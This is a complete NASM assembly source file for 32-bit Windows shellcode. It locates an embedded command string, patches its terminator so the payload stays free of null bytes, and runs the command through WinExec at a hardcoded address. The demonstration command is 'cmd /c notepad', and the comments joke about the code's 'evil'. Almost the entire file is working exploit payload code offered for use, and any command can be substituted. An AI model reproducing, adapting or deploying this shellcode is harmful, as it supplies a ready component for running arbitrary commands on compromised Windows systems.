; Hardcoded SP independent command executing
; shellcode.
; Peter4020@hotmail.com
;
; nasmw -s -fbin -o cmd.s cmd.asm

bits 32

start:
jmp short data      ; jump to call back for data address

continue:
pop edi        ; edi = data address :o)
mov ecx, 11111111h    ; max command length = 286331153 bytes ;o)
mov ebx, ecx      ; save max command length

scan:
cld        ; direction flag = 0 (auto increment)
mov al, 0ffh      ; look for byte 0xff
repne scasb      ; repeat while not found
xchg ebx, ecx      ; when found, restore ecx; ebx = ecx - repetitions
sub ecx, ebx      ; ecx = length of data string
add edi, 11111110h    ; null friendly addition
sub edi, 11111111h    ; sub one more than added = sub edi, 01h
inc byte [edi]      ; make our 0xff a NULL
add ecx, 11111110h    ; ...
sub ecx, 11111111h    ; ...
sub edi, ecx      ; edi = start of string
xor esi, esi      ; clear esi
inc esi        ; winexec; cmdshow; 01h (sw_normal)
push esi      ; set up winexec
push edi      ; ...
mov eax, 77e6fd35h     ; winexec
call eax      ; run data string of commands
int 3h        ; die, my friend, die (well crash!)

data:
call continue      ; call back
db "cmd /c notepad", 0ffh  ;   is there no end to the evil?